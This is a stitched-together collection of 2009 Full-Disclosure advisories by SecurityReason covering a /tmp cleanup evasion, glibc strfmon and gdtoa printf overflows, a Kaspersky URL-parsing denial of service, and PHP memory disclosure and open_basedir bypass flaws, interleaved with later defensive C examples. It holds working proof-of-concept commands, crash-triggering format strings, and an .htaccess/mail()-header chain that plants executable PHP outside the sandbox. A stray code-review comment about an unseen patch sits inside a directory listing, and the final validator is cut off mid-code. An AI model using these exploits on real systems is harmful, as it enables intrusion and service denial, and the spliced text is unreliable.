Here the daemon will come to tmp_dir (/tmp) and wants to clean it with the sequence "[a-km-pr-zA-Z]*". It will kill this script any time it is started. So if we create directory "A" in /tmp, all other files and directories in alphabetical order will not be deleted.

Proof of Concept:
User cxib has created the exploit in the main /tmp dir.

exploit:
127# cd /tmp && perl -e '$a="C"x22;for(1..5){ ! -d $a and mkdir $a and chdir $a }'

In /tmp we have
# ls -la
total 22
drwxrwxrwt 10 root wheel 512 Aug 11 01:18 .
drwxr-xr-x 27 root wheel 1024 Aug 11 00:09 ..
drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix
- -r--r--r-- 1 root wheel 11 Aug 11 00:11 .X0-lock
drwxrwxrwt 2 root wheel 512 Aug 11 00:11 .X11-unix
- -rw-r--r-- 1 root wheel 0 Aug 11 01:18 A
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 B
drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CC
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D
- -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg
drwx------ 2 root wheel 512 Aug 11 00:49 kde-root
drwx------ 3 root wheel 512 Aug 11 01:14 ksocket-root
drwx------ 2 root wheel 512 Aug 11 00:11 mc-root

Correct behavior will delete all files after reboot. So let's do it.
# reboot

Now we have in /tmp
# ls -la
total 18
drwxrwxrwt 9 root wheel 512 Aug 11 13:57 .
drwxr-xr-x 27 root wheel 1024 Aug 11 14:02 ..
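Review bot: the SET(FTS_STOP) in the new block ends the whole traversal, not just the subtree that hit SHRT_MAX: fts_read() returns NULL once FTS_STOP is set, so a caller such as rm -rf or find never sees the siblings that sort after the deep directory, which is exactly what the /tmp listings in this post show. Consider returning NULL with `cur->fts_info = FTS_ERR;` and `errno = ENAMETOOLONG;` but without SET(FTS_STOP), so that fts_read() hands the directory back to the caller as an FTS_ERR entry and continues with the next one, the way an unopenable directory is already reported as FTS_DNR; the caller can then decide whether one unreadable subtree should abort the walk. Also set `cur->fts_errno = ENAMETOOLONG;` alongside errno, since fts(3) documents fts_errno as the field consumers read for FTS_ERR entries and callers that print diagnostics use p->fts_errno rather than the global. The (void)closedir(dirp) before the early return is right, and the check sits correctly before `level = cur->fts_level + 1;`, which would otherwise overflow the short.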
drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix
drwxrwxrwt 2 root wheel 512 Aug 11 01:19 .X11-unix
drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CC
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D
- -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg
drwx------ 2 root wheel 512 Aug 11 00:49 kde-root
drwx------ 3 root wheel 512 Aug 11 01:19 ksocket-root
drwx------ 2 root wheel 512 Aug 11 00:11 mc-root

File A and dir B have been deleted. But file chujwamwmuzg and directories {D,Cx22} are still available.

To resolve this, we can use the openbsd fix. However, this does not fully resolve the problem. The user can create a directory (like Cx22) that can not be removed by rm(1). To remove the Cx22 folder, we can use the program made by openbsd

- ---
#i
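The closing remark, that rm(1) cannot remove the Cx22 chain, comes down to path length: rm -r builds the full path of every entry, and the kernel refuses paths longer than PATH_MAX with ENAMETOOLONG. As an added example (not the OpenBSD program the advisory refers to, whose text is cut off above), the following C builds such a chain under a fresh directory in /tmp and removes it with the POSIX.1-2008 descriptor-relative calls openat, mkdirat, fdopendir and unlinkat, so the full path is never formed. make_chain, rm_tree_at and demo_deep_removal are this example's own names; the depth, the 22-character name and the /tmp/deep.XXXXXX template are assumptions chosen to exceed PATH_MAX.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create `depth` nested directories called `name` under `root`, descending
 * with openat(2) so no absolute path is ever built. Returns 0 or -1. */
static int make_chain(const char *root, const char *name, int depth)
{
	int fd = open(root, O_RDONLY | O_DIRECTORY);
	if (fd < 0)
		return -1;
	for (int i = 0; i < depth; i++) {
		int next;
		if (mkdirat(fd, name, 0700) < 0 ||
		    (next = openat(fd, name, O_RDONLY | O_DIRECTORY)) < 0) {
			close(fd);
			return -1;
		}
		close(fd);
		fd = next;
	}
	close(fd);
	return 0;
}

/* Remove parent/name and everything below it using only descriptor-relative
 * calls; the total path length never matters. Symlinks are unlinked, not
 * followed. Returns 0 on success, -1 if anything could not be removed. */
static int rm_tree_at(int parent, const char *name)
{
	int fd = openat(parent, name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
	if (fd < 0) {
		if (errno == ENOTDIR || errno == ELOOP)   /* plain file or symlink */
			return unlinkat(parent, name, 0);
		return -1;
	}
	DIR *d = fdopendir(fd);
	if (!d) {
		close(fd);
		return -1;
	}
	int rc = 0;
	struct dirent *e;
	while ((e = readdir(d)) != NULL) {
		if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
			continue;
		if (rm_tree_at(fd, e->d_name) < 0)
			rc = -1;
	}
	closedir(d);                                   /* closes fd too */
	if (rc == 0 && unlinkat(parent, name, AT_REMOVEDIR) < 0)
		rc = -1;
	return rc;
}

/* Builds a chain of 22-character names (as in the PoC) whose full path is
 * longer than PATH_MAX inside a fresh temporary directory, removes it, and
 * returns 1 when the temporary directory is gone again. */
static int demo_deep_removal(void)
{
	char tmp[] = "/tmp/deep.XXXXXX";
	const char *name = "CCCCCCCCCCCCCCCCCCCCCC";
	int depth = PATH_MAX / (int)(strlen(name) + 1) + 8;   /* > PATH_MAX bytes */
	struct stat st;

	if (!mkdtemp(tmp) || make_chain(tmp, name, depth) < 0)
		return -1;
	if (rm_tree_at(AT_FDCWD, tmp) < 0)
		return -1;
	return stat(tmp, &st) < 0 && errno == ENOENT;
}

int main(void)
{
	printf("deep tree removed: %s\n", demo_deep_removal() == 1 ? "yes" : "no");
	return 0;
}
```

The same descriptor-relative walk is what a cleanup job like cleartmp needs if it is not to be stopped by one entry: an error on one subtree is reported and the loop moves on to the next sibling instead of giving up on the whole directory.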
[Full-disclosure] SecurityReason: glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.03.2008
- - Pub.: 17.09.2009

CVE: CVE-2008-1391
Risk: High

Affected Software (tested 27.08.2009):
- - Fedora 11
- - Slackware 12.2
- - Ubuntu 9.04
- - other linux distributions

Original URL:
http://securityreason.com/achievement_securityalert/67

Previous URL:
http://securityreason.com/achievement_securityalert/53

- --- 0.Description ---
strfmon -- convert monetary value to string

The strfmon() function places characters into the array pointed to by s as controlled by the string pointed to by format. No more than maxsize bytes are placed into the array. The format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the output stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each conversion specification is introduced by the % character.

SYNOPSIS:
#include <monetary.h>
ssize_t strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...);

- --- 1. glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities ---
In March 2008, our team published a security note (SREASONRES:20080325) about vulnerabilities in the strfmon(3) function. The issue was officially diagnosed in NetBSD, FreeBSD and MacOSX. However, from the source code, glibc is also vulnerable to it. We informed the glibc team. However, the description of the issue and the fix were not enough for the gnu team. They changed the status to BOGUS and the response was:

- ---
And what exactly does an BSD implementation has to do with glibc?
- ---

Today we know that only NetBSD is secure from this, and all systems using glibc are affected. Despite the differences in the code of NetBSD libc and glibc, the issue is the same, but the exploit differs from that presented in (SREASONRES:20080325).

Description of the vulnerability:
http://securityreason.com/achievement_securityalert/53 (SREASONRES:20080325)
http://xorl.wordpress.com/2009/04/11/cve-2008-1391-netbsd-strfmon-integer-overflow/

Description of the fix:
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-006.txt.asc

To present this issue in Fedora 11, we will use the php client. money_format() uses the strfmon(3) function, so this program will be perfect.

[...@localhost ~]$ php -r 'money_format("%.1073741821i",1);'
Segmentation fault

for 'money_format("%.1073741821i",1);' we will get

Program received signal SIGSEGV, Segmentation fault.
0x0019331a in __printf_fp () from /lib/libc.so.6
(gdb) bt
#0 0x0019331a in __printf_fp () from /lib/libc.so.6
#1 0x0018832b in __vstrfmon_l () from /lib/libc.so.6
#2 0x00187a36 in strfmon () from /lib/libc.so.6

strfmon() will call __printf_fp() with an overflowed arg. In result

(gdb) x/20s ($esi)-10
0x8448ff6: ""
0x8448ff7: ""
0x8448ff8: "0"
0x8448ffa: ""
0x8448ffb: ""
0x8448ffc: "0"
0x8448ffe: ""
0x8448fff: ""
0x8449000:
0x8449000:
0x8449000:
...
(gdb) i r
eax 0x30 48
ecx 0x0 0
edx 0x0 0
ebx 0x2bdff4 2875380
esp 0xbfffec14 0xbfffec14
ebp 0xbfffed78 0xbfffed78
esi 0x8449000 138711040
edi 0x810c 33036
eip 0x19331a 0x19331a <__printf_fp+3274>

Now let's see what will happen for 'money_format("%.1073741822i",1);'

Program received signal SIGSEGV, Segmentation fault.
0x0034b27b in hack_digit.12295 () from /lib/libc.so.6

php will crash in hack_digit().

(gdb) i r
eax 0x3ffffffe 1073741822
ecx 0x32 50
edx 0x2 2
ebx 0x476ff4 4681716
esp 0xbfffebc4 0xbfffebc4
ebp 0xbfffebf4 0xbfffebf4
esi 0x32 50
edi 0x3e 62

we can try to change the edi register.

For 'money_format("%.1073741824i",1);'

(gdb) i r
eax 0x40000000 1073741824
ecx 0x32 50
edx 0x2 2
ebx 0x35bff4 3522548
esp 0xbfffebbc 0xbfffebbc
ebp 0xbfffebec 0xbfffebec
esi 0x32 50
edi 0x42 66

But let's see what will happen for 'money_format("%.77715949976712904702i", 1.1);'

crash in

Program received signal SIGSEGV, Segmentation fault.
0x00e4327b in hack_digit.12295 () from /lib/libc.so.6
(gdb) i r
eax 0x3ffffffe 1073741822
ecx 0x34 52
edx 0x2 2
ebx 0xf6eff4 16183284
esp 0xbfffebb4 0xbfffebb4
ebp 0xbfffebe4 0xbfffebe4
esi 0x34 52
edi 0x3e 62

esi 52. In
[Full-disclosure] Kaspersky AV/IS 2010 (avp.exe) Denial-of-Service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Kaspersky AV/IS 2010 (avp.exe) Denial-of-Service ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.07.2009
- - Pub.: 19.08.2009

Risk: Medium

Affected Software (tested):
- - Kaspersky Internet Security 2010 9.0.0.459 (a) EN
- - Kaspersky Anti-Virus 2010 9.0.0.463 DE

Original URL:
http://securityreason.com/achievement_securityalert/66

- --- 0.Description ---
Kaspersky Lab is a computer security company, co-founded by Natalia Kasperskaya and Eugene Kaspersky in 1997, offering anti-virus, anti-spyware, anti-spam, and anti-intrusion products. Kaspersky Lab is a privately held company headquartered in Moscow, Russia with regional offices in Germany, France, the Netherlands, the UK, Poland, Romania, Sweden, Japan, China, Korea and the USA.

- --- 1. Kaspersky AV/IS 2010 avp.exe Denial of Service ---
The main problem exists in parsing url addresses. If we give a lot of dots, the kaspersky avp.exe process will get 100% of CPU and will block traffic via browsers. The relative time to return to normal behavior is very long. In practice, when we give a large number of dots, kaspersky will not return to normal behavior.

This example will deny access to the browser and other kaspersky operations

http://lu.cxib.net/.[ .xY where 1024http://lu.cxib.net/..[ more dots ]">

The user who executed the code above will be deprived of the possibility of browsing and of successively resetting kaspersky.

Tested on:
- - Kaspersky Internet Security 2010 9.0.0.459 (a) (EN) + Windows Vista Enterprise (EN)
- - Kaspersky Anti-Virus 2010 9.0.0.463 (DE) + Windows XP Home Edition (DE)

0day (18.08.2009) exploit you can find:
http://securityreason.com/downloads/kaspersky.2010.dos.html

This script will generate tags with different url lengths to block kaspersky services. However, we can also exploit this issue via html email. The method of attack is simple. The victim need only refer to a faulty address.

- --- 2. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 3. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d0t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://securityreason.pl/

- --
Best Regards,
- pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkqLQqIACgkQpiCeOKaYa9aLxgCgy3FzzR5xPzU6QgoK1VpHpjur
paQAn3ku0sU5AzHjzjo3N0qq+Kywu7i1
=rQAP
-----END PGP SIGNATURE-----
[Full-disclosure] SECURITYREASON: PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - - Dis.: 10.07.2009
- - - Pub.: 06.08.2009

Risk: High

Affected Software:
- - - PHP 5.3.0
- - - PHP 5.2.10

Original URL:
http://securityreason.com/achievement_securityalert/65

- - --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.ini-restore.php

ini_restore - Restores the value of a configuration option
ini_restore ( string $varname )

- - --- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ---
The main problem exists in restoring php config environments. To demonstrate the problem, we need to declare variables via the ini_set() function. When we try to use ini_restore(), variables in class PG() will point to any part of memory.

- - ---zend_ini.c---
static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int stage TSRMLS_DC) /* {{{ */
{
	if (ini_entry->modified) {
		if (ini_entry->on_modify) {
			zend_try {
				/* even if on_modify bails out, we have to continue on with restoring,
				   since there can be allocated variables that would be freed on MM shutdown
				   and would lead to memory corruption later ini entry is modified again */
				ini_entry->on_modify(ini_entry, ini_entry->orig_value, ini_entry->orig_value_length, ini_entry->mh_arg1, ini_entry->mh_arg2, ini_entry->mh_arg3, stage TSRMLS_CC);
			} zend_end_try();
		}
		if (ini_entry->value != ini_entry->orig_value) {
			efree(ini_entry->value);
		}
		ini_entry->value = ini_entry->orig_value;
		ini_entry->value_length = ini_entry->orig_value_length;
		ini_entry->modified = 0;
		ini_entry->orig_value = NULL;
		ini_entry->orig_value_length = 0;
		if (ini_entry->modifiable >= (1 << 3)) {
			ini_entry->modifiable >>= 3;
		}
	}
	return 0;
}
- - ---zend_ini.c---

The flag modified will be reset, and we can not consider the variable modified. We don't check the value of ini_entry->on_modify(), and PG() will now be out of memory range.

To demonstrate this issue

- - ---example0 (5.2.10/5.3.0)---
127# uname -a && php -v
OpenBSD 127.cxib 4.6 GENERIC#0 i386
PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul 5 2009 21:43:12)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
    with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
127# cat /var/www/www/sess.php
127# php /var/www/www/sess.php
AAA
PHP Warning: session_start(): open($|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown: open($|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct ($|ma: no-cache) in Unknown on line 0
127# php /var/www/www/sess.php
PHP Warning: session_start(): open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown: open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (¤^j|ma: no-cache) in Unknown on line 0
- - ---example0 (5.2.10/5.3.0)---

The main problem starts in ini_restore("session.save_path"). To show this issue, we need to use some function with PG() inside (like: session_start()).

- - ---example1 (5.3.0)---
127# uname -mrs && php -v
NetBSD 5.0 i386
PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies
127# cat /www/file.php
127# php /www/file.php
PHP Warning: include(): open_basedir restriction in effect. File(B) is not within the allowed path(s): (4?e»X?p») in /www/file.php on line 7

Warning: include(): open_basedir restriction in effect. File(B) is not within the allowed path(s): (4?e»X?p») in /www/file.php on line 7
PHP Warning: include(B): failed to open stream: Operation not permitted in /www/file.php on line 7

Warning: include(B): failed to open stream: Operation not permitted in /www/file.php on line 7
PHP Warning: include(): Failed opening 'B' for inclusion (include_path='.:/
[Full-disclosure] PHP 5.3.0 (main.c) open_basedir bypass
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.3.0 (main.c) open_basedir bypass ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - - Dis.: 26.05.2009
- - - Pub.: 06.08.2009

Risk: Medium

Affected Software:
PHP 5.3.0

Original URL:
http://securityreason.com/achievement_securityalert/64

- - --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

http://lu2.php.net/manual/en/mail.configuration.php

mail.log	NULL	PHP_INI_SYSTEM|PHP_INI_PERDIR	Available since PHP 5.3.0.

- - --- 1. PHP 5.3.0 (main.c) open_basedir bypass ---
The first issue exists in main/main.c

- - ---
STD_PHP_INI_ENTRY("mail.log", NULL, PHP_INI_SYSTEM|PHP_INI_PERDIR, OnUpdateString, mail_log, php_core_globals, core_globals)
- - ---

Access PHP_INI_PERDIR is accepted by .htaccess (Apache) or .user.ini (CGI). The function OnUpdateString doesn't check open_basedir. To fix this, we need to create a new function OnUpdateMailLog, where open_basedir will be checked.

Exploit:

127# cat /www/home/cx/show.php
127# curl http://localhost/home/cx/show.php
/www/home/cx
127# cat /www/home/cx/set.php
127# curl http://localhost/home/cx/set.php

Warning: ini_set(): open_basedir restriction in effect. File(/www/home/gpkc/tmp/) is not within the allowed path(s): (/www/home/cx) in /www/home/cx/set.php on line 2

We need to create .htaccess or .user.ini

for Apache SAPI:
127# echo 'php_value mail.log /www/home/gkpc/tmp/exploit.php' > ./.htaccess

for CGI:
127# echo 'mail.log = /www/home/gkpc/tmp/exploit.php' > ./.user.ini

and some file with the mail() function inside. In the X-Mailer header, we can put some php code to execute in the other open_basedir range, like:

127# cat /www/home/cx/runmail.php
http://securityreason.com';
$message = 'exploit';
$headers = 'From: s...@spam.c0m' . "\r\n" .
    'Reply-To: s...@spam.c0m' . "\r\n" .
    'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
?>
127# curl http://localhost/home/cx/runmail.php
127# ls -la /www/home/gkpc/tmp/exploit.php
- - -rw-r--r-- 1 www www 173 Jun 30 05:20 /www/home/gkpc/tmp/exploit.php

Finish! Now we can exec the evil script exploit.php via httpd.

127# curl http://localhost/home/gkpc/tmp/exploit.php
mail() on [/www/home/cx/runmail.php:9]: To: s...@spam.c0m -- Headers: From: s...@spam.c0m Reply-To: s...@spam.c0m X-Mailer: PHP/www/home/gkpc/5.3.0

exploit.php is now in the open_basedir=/www/home/gkpc/ range.

- - --- 2. Fix ---
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c

- - --- 3. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

- - --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t>com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

- -----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkp7FY4ACgkQpiCeOKaYa9YP7ACeKLHh47A/PJo7oPducKF/Iu0N
SZMAn0dMdoqrEnwYZeB2KuzlCK7wc/rB
=jSMc
- -----END PGP SIGNATURE-----
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkp8K5kACgkQpiCeOKaYa9Yv0wCgulgKdIlAx8fErD+/f7Do/hbs
qpQAn3VloWZCINo3wmqt4+uIo/m3fO7c
=0K2+
-----END PGP SIGNATURE-----
[Full-disclosure] SecurityReason: Multiple Vendors libc/gdtoa printf(3) Array Overrun
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Multiple Vendors libc/gdtoa printf(3) Array Overrun ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 25.06.2009

CVE: CVE-2009-0689
Risk: High

Affected Software (12.06.2009):
- - OpenBSD 4.5
- - NetBSD 5.0
- - FreeBSD 7.2/6.4

Original URL:
http://securityreason.com/achievement_securityalert/63

- --- 0.Description ---
A week after the release of the new versions of OpenBSD and NetBSD, our research team checked the new implementation of gdtoa.

http://openbsd.org/45.html
- ---
A new version of the gdtoa code has been integrated, bringing better C99 support to printf(3) and friends.
- ---

More:
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/

- --- 1. Multiple Vendors libc/gdtoa printf(3) Array Overrun ---
The main problem exists in the new dtoa implementation. asprintf(3) will crash for

asprintf(ssij, "%0.262159f",x)

where x != 0. The behavior is correct for 262158.

Let's see:

(gdb) r
Starting program: /cxib/C/check

Program received signal SIGSEGV, Segmentation fault.
0x79d9 in __Balloc_D2A () from /usr/lib/libc.so.12
(gdb) bt
#0 0x79d9 in __Balloc_D2A () from /usr/lib/libc.so.12
#1 0xbbbab6d7 in __rv_alloc_D2A () from /usr/lib/libc.so.12
#2 0xbbba8db5 in __dtoa () from /usr/lib/libc.so.12
#3 0xbbba671f in __vfprintf_unlocked () from /usr/lib/libc.so.12
#4 0xbbb882e1 in asprintf () from /usr/lib/libc.so.12
#5 0x08048706 in main () at check.c:6

Let's see src/lib/libc/gdtoa/gdtoaimp.h

- ---gdtoaimp.h---
...
#define Kmax 15
...
- ---gdtoaimp.h---

The maximum Kmax length is 15. If we give a bigger value, like 17 (edi), the program will overrun the freelist array. bss will have 0x1.

Correct reason (by NetBSD):

- ---gdtoaimp.h---
...
#define Kmax (sizeof(size_t) << 3)
...
- ---gdtoaimp.h---

What is wrong?
This program will crash in

- --- src/lib/libc/gdtoa/misc.c ---
	if ( (rv = freelist[k]) !=0) {
		freelist[k] = rv->next;
	}
	else {
		x = 1 << k;
#ifdef Omit_Private_Memory
		rv = (Bigint *)MALLOC(sizeof(Bigint) + (x-1)*sizeof(ULong));
#else
		len = (sizeof(Bigint) + (x-1)*sizeof(ULong) + sizeof(double) - 1)
			/sizeof(double);
		if ((double *)(pmem_next - private_mem + len) <= (double *)PRIVATE_mem) {
			rv = (Bigint*)(void *)pmem_next;
			pmem_next += len;
		}
		else
			rv = (Bigint*)MALLOC(len*sizeof(double));
#endif
		if (rv == NULL)
			return NULL;
		rv->k = k;
		rv->maxwds = x;
	}
- --- src/lib/libc/gdtoa/misc.c ---

here

rv->k = k;

or

freelist[k] = rv->next;

A good example to show this issue is the printf(1) program.

127# printf %1.262159f 1.1
Memory fault (core dumped)

127# printf %11.210999f 210911999111791199.510001001
esi = 0x12
edi = 0x1d

127# printf %11.200999f 220911999111791199.510001001
esi = 0x13
edi = 0x1d

we can manipulate the esi reg.

127# printf %11.200999f 1267686681.10001

Program received signal SIGSEGV, Segmentation fault.
__Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:59
59 freelist[k] = rv->next;
(gdb) i r
eax 0x20efdb04 552590084
ecx 0x77ce2a9d 201029
edx 0x0 0
ebx 0x20eff654 552597076
esp 0xcfbfc2b0 0xcfbfc2b0
ebp 0xcfbfc2c8 0xcfbfc2c8
esi 0x41414141 1094795585
edi 0x1d 29
eip 0xf59317 0xf59317
eflags 0x10206 66054
cs 0x2b 43
ss 0x33 51
ds 0x33 51
es 0x33 51
fs 0x33 51
gs 0x33 51

esi = 0x41414141
edi = 0x1d

1267686681 is the value of the esi reg. The program will crash in freelist[k] = rv->next;

Example 0:
- --- chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;
- --- chujwamwmuzg.pl ---

Perl will crash with
esi = 0x41414141
edi = 0x15

Example 1:
127# php -r 'money_format("%0.262159n", 1.);'
Memory fault (core dumped)

Programs that allow you to enter/control the format string are vulnerable. We believe that the OpenBSD source-tree has only printf(1) and perl(1) affected.
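To make the overrun concrete, the following C is an added model of the Balloc()/Bfree() pair quoted from misc.c above (an example written for this page, not gdtoa's source): one free list per block size 2^k, indexed by k, which is exactly the array the advisory says is overrun once k exceeds Kmax. The bounds check at the top of balloc() is what the vulnerable code lacked; KMAX_OLD records the value from the vulnerable gdtoaimp.h and KMAX uses NetBSD's replacement expression. The Bigint layout is simplified and the names balloc, bfree, k_for_words, reuse_works and overruns_old_table are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

typedef uint32_t ULong;
typedef struct Bigint {
	struct Bigint *next;
	int k, sign, wds;
	size_t maxwds;
	ULong x[1];                /* really 2^k words follow */
} Bigint;

#define KMAX_OLD 15                           /* vulnerable gdtoaimp.h */
#define KMAX ((int)(sizeof(size_t) << 3))     /* NetBSD's replacement */

/* One free list per block size 2^k: indexing it with k > KMAX is the
 * out-of-bounds access behind the crash in __Balloc_D2A(). */
static Bigint *freelist[KMAX + 1];

/* Hand out a Bigint able to hold 2^k words, reusing a freed block of that
 * size when there is one. Returns NULL for a k the table cannot index or a
 * block that cannot be sized. */
static Bigint *balloc(int k)
{
	if (k < 0 || k > KMAX)                 /* the check the vulnerable code lacked */
		return NULL;
	if (k >= (int)(sizeof(size_t) * 8))    /* 2^k words cannot even be sized */
		return NULL;
	Bigint *rv = freelist[k];
	if (rv) {
		freelist[k] = rv->next;            /* the line that crashed with k = 29 */
		return rv;
	}
	size_t x = (size_t)1 << k;
	if (x > (SIZE_MAX - sizeof(Bigint)) / sizeof(ULong))   /* overflow guard */
		return NULL;
	rv = malloc(sizeof(Bigint) + (x - 1) * sizeof(ULong));
	if (!rv)
		return NULL;
	rv->k = k;
	rv->maxwds = x;
	rv->sign = rv->wds = 0;
	return rv;
}

/* Return a block to the free list of its size class. */
static void bfree(Bigint *v)
{
	if (!v)
		return;
	v->next = freelist[v->k];
	freelist[v->k] = v;
}

/* Smallest k with 2^k >= words, i.e. the size class a result needing that
 * many ULongs is requested from. */
static int k_for_words(size_t words)
{
	int k = 0;
	while (((size_t)1 << k) < words)
		k++;
	return k;
}

/* Whether a request for size class k indexes past the 16-entry table of
 * the vulnerable build. */
static int overruns_old_table(int k)
{
	return k > KMAX_OLD;
}

/* Free-list round trip: a block freed at size class k is handed out again
 * by the next request for k. Returns 1 on success, 0 if k is refused. */
static int reuse_works(int k)
{
	Bigint *a = balloc(k);
	if (!a)
		return 0;
	bfree(a);
	return balloc(k) == a;
}

int main(void)
{
	return reuse_works(17) && overruns_old_table(17) ? 0 : 1;
}
```

With the old Kmax of 15, a request such as k = 17 reads freelist[17] from whatever follows the array in .bss, which the advisory observes as the stray 0x1, and then writes rv->next back there; the check above turns that into a NULL return that the caller can treat as an allocation failure.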
Functions like printf(3), strfmon(3), fprintf(3), sprintf(3), snprintf(3), asprintf(3), vprintf(3), vfprintf(3), vsprintf(3), vsnprintf(3), vasprintf(3) and others are vulnerable (with the new gdtoa impl.)

Other languages are also affected (printf in perl).

- --- 2. Fix ---
NetBSD fix:
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gd
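Every crash on this page that starts from a format string (the repeated '*' in printf(1) further up, the %.1073741821i passed to strfmon(3) through money_format() in the glibc advisory, and %0.262159f here) could have been refused before the C library saw it. As an added example, not part of any of these advisories, the following C validator walks a printf(3)- or strfmon(3)-style format, caps width and precision, accepts '*' only where one argument can supply it, and returns how many arguments the format consumes, so that a printf(1)-like caller can compare that count with what it was given before calling vprintf(3) (the "%*s" 666 case, where the string argument was missing). fmt_check, parse_num, the flag set and the cap are this example's own; the conversion letters accepted are passed in by the caller.

```c
#include <ctype.h>
#include <string.h>

/* Parse one decimal run at s into *out, refusing any value above `cap`
 * (this also rules out integer overflow). Returns the number of characters
 * consumed, or -1 if the cap was exceeded. cap must be at least 10. */
static int parse_num(const char *s, long cap, long *out)
{
	long v = 0;
	int i = 0;
	while (isdigit((unsigned char)s[i])) {
		int d = s[i] - '0';
		if (v > (cap - d) / 10)     /* v * 10 + d would exceed cap */
			return -1;
		v = v * 10 + d;
		i++;
	}
	*out = v;
	return i;
}

/* Validate a format string before handing it to printf(3) or strfmon(3).
 * `convs` lists the conversion characters the caller accepts (for example
 * "diouxXeEfFgGs" for printf, "in" for strfmon); `cap` bounds width and
 * precision. Returns the number of arguments the format consumes, or -1 if
 * a conversion is malformed or unknown, '*' appears where an argument
 * cannot supply it, or a width/precision exceeds the cap. */
static int fmt_check(const char *fmt, const char *convs, long cap)
{
	int args = 0;
	for (const char *p = fmt; *p; p++) {
		if (*p != '%')
			continue;
		p++;
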